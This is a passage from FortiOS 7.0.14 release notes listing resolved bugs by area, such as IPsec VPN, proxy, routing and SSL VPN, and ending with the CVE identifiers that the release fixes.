    984852    The HA/AUX ports are not enabled on boot up when using the NPU path option.

    Intrusion Prevention
    Bug ID    Description
    923393    IPS logs show incorrect source and destination IP addresses and policy IDs, and the ports are zeros.

    IPsec VPN
    Bug ID    Description
    897867    IPsec VPN between two FortiGates (100F and 60F) experiences slow throughput compared to the available underlay bandwidth.
    898961    diagnose traffictest issues with dynamic IP addresses and loopback interfaces.
    914418    File transfer stops after a while when offloading is enabled.
    921691    In FGSP, IKE routes are not removed from the kernel when secondary-add-ipsec-routes is disabled.
    926002    Incorrect traffic order in IPsec aggregate redundant member list after upgrade.
    945873    Inconsistency of mode-cfg between phase 1 assigned IP address and destination selector addition.
    950012    IPsec tunnels stuck on NP6XLite spoke drop the ESP packet.
    950445    After a third-party router failover, traffic traversing the IPsec tunnel is lost.
    961305    FortiGate is sending ESP packets with source MAC address of port1 HA virtual MAC address.
    968218    When the IPsec tunnel destination MAC address is changed, tunnel traffic may stop.

    Log & Report
    Bug ID    Description
    940814    Administrators without read permissions for the threat weight feature cannot see the event log menu.
    954565    Although there is enough disk space for logging, IPS archive full message is shown.
    965247    FortiGate syslog format in reliable transport mode is not compliant with RFC 6587.
    967692    The received traffic counter is not increasing when the traffic is HTTPS with webfilter.
    987261    In the webfilter content block UTM log in proxy inspection mode, sentbyte and rcvdbyte are zero.

    Proxy
    Bug ID    Description
    790426    An error case occurs in WAD while redirecting the web filter HTTPS sessions.
    806556    Unexpected behavior in WAD when the ALPN is set to http2 in the ssl-ssh-profile.
    828917, 919781    Unexpected behavior in WAD when there are multiple LDAP servers configured on the FortiGate.
    845361    A rare error condition occurred in WAD caused by compounded SMB2 requests.
    940149    Inadvertent traffic disruption caused by WAD when it receives an HTTP2 data frame payload on a dead stream.
    947814    Too many redirects on TWPP after the second KRB keytab is configured.
    954104    An error case occurs in WAD when WAD gets the external authenticated users from other daemons.

    Routing
    Bug ID    Description
    781483    Incorrect BGP Originator_ID from route reflector seen on receiving spokes.
    890954    The change of an IPv6 route does not mark sessions as dirty nor trigger a route change.
    897666    Issue with SD-WAN rule for FortiGuard.
    914815    FortiGate 40F-3G4G not adding LTE dynamic route to route table.
    926525    Routing information changed log is being generated from secondary in an HA cluster.
    952908    Locally originated type 5 and 7 LSAs' forward address value is incorrect.
    954100    Packet loss status in SD-WAN health check occurs after an HA failover.

    Security Fabric
    Bug ID    Description
    782518    Threat feeds are showing that the connection status has not started when it should be connected.
    841364    Cisco APIC SDN update times out on large datasets.
    956423    In HA, the primary unit may sometimes show a blank GUI screen.

    SSL VPN
    Bug ID    Description
    894704    FortiOS check would block iOS and Android mobile devices from connecting to the SSL VPN tunnel.
    898889    The internal website does not load completely with SSL VPN web mode.
    906756    Update SSL VPN host check logic for unsupported OS.
    957406    OS checklist for SSL VPN in FortiOS does not include macOS Sonoma 14.

    Switch Controller
    Bug ID    Description
    816790    Console printed DSL related error messages when disconnecting the managed FortiSwitch and connecting to the FortiGate again.
    858749    Redirected traffic should not hit the firewall policy when allow-traffic-redirect is enabled.
    911232    Security rating shows an incorrect warning for unregistered FortiSwitches on the WiFi & Switch Controller > Managed FortiSwitches page.
    937065    An exported FortiSwitch port is not correctly showing up/down status.

    System
    Bug ID    Description
    631046    diagnose sys logdisk smart does not work for NVMe disk models.
    733096    FG-100F HA secondary's unused ports flap from down to up, then to down.
    763739    On FG-200F, the Outbound bandwidth in the Bandwidth widget does not match outbandwidth setting.
    861661    SNMP OID 1.3.6.1.2.1.4.32 ipAddressPrefixTable is not available.
    882187    FortiGate enters conserve mode in a few hours after enabling UTM on the policies.
    888655    FortiGate queries system DNS for A <Root> and AAAA <Root> servers.
    894045    Sensor information widget continuously loading.
    909225    ISP traffic is failing with the LAG interfaces on upstream switches.
    910700    Ports are flapping and down on the FortiGate 3980E.
    912092    FortiGate does not send ARP probe for UDP NP-offloaded sessions.
    916493    Fail detection function does not work properly on X1 and X2 10G ports.
    919901    For FIPS-CC mode, the strict check for basic constraints should be removed for end entity certificates.
    926817    Review the temperature sensor for the SoC4 system.
    929904    When L3 or L4 hashing algorithm is used, traffic is not forwarded over the same aggregate member after being offloaded by NP7.
    937982    High CPU usage might be observed on entry-level FortiGates if the cache size reaches 10% of the system memory.
    938174    ARP issue with VXLAN over IPsec and Soft Switch.
    938981    The virtual server http-host algorithm is redirecting requests to an unexpected server.
    943948    FortiGate as L2TP client is not working with Cisco ASR as L2TP server.
    946413    Temperature sensor value missing for FG-180xF, FG-420xF, and FG-440xF platforms.
    947240    FortiGate is not able to resolve ARPs of a few hosts due to their ARP replies not reaching the primary FPM.
    955074    MSS clamping is not working on VXLAN over IPsec after upgrading.
    960707    Egress shaping does not work on NP when applied on the WAN interface.
    962153    A port that uses a copper-transceiver does not update the link status in real-time.
    963600    SolarWinds unable to negotiate encryption, no matching host key type found.
    966761    SNMP OID 1.3.6.1.2.1.4.34.1.5 ipAddressPrefix is not fully implemented.
    971404    Session expiration does not get updated for offloaded traffic between a specific host range.
    977231    An error condition occurred in fgfm caused by an out-of-band management configuration.

    User & Authentication
    Bug ID    Description
    837185    Automatic certificate name generation is the same for global and VDOM remote certificates, which can cause certificates to exist with the same name.
    864703    ACME client fails to work with some CA servers.
    868994    FortiGate receives FSSO user in the format of HOSTNAME$.

    VM
    Bug ID    Description
    938382    OpenStack Queens FortiGate VM HA heartbeat on broadcast is not working as expected.
    968740    Unexpected behavior in awsd caused by tags with an empty value on AWS instances while adding a new AWS Fabric connector.

    WAN Optimization
    Bug ID    Description
    954541    In WANOpt transparent mode, WAN optimization does not keep the original source address of the packets.

    Web Filter
    Bug ID    Description
    925801    Custom Images are not seen on Web Filter block replacement page for HTTP traffic in flow mode.
    982156    The URL local/user category rating result has only one best match category (longest URL pattern match), and other matched local/user categories cannot be chosen even if the category is configured in the profile.

    WiFi Controller
    Bug ID    Description
    874997    Fetching the registration status does not always work.

    Common Vulnerabilities and Exposures
    Visit https://fortiguard.com/psirt for more information.
    Bug ID    CVE references
    956553    FortiOS 7.0.14 is no longer vulnerable to the following CVE Reference: CVE-2024-23112
    959918    FortiOS 7.0.14 is no longer vulnerable to the following CVE Reference: CVE-2023-38545
    989429    FortiOS 7.0.14 is no longer vulnerable to the following CVE Reference: CVE-2024-21762
    993323    FortiOS 7.0.14 is no longer vulnerable to the following CVE Reference: CVE-2024-23113
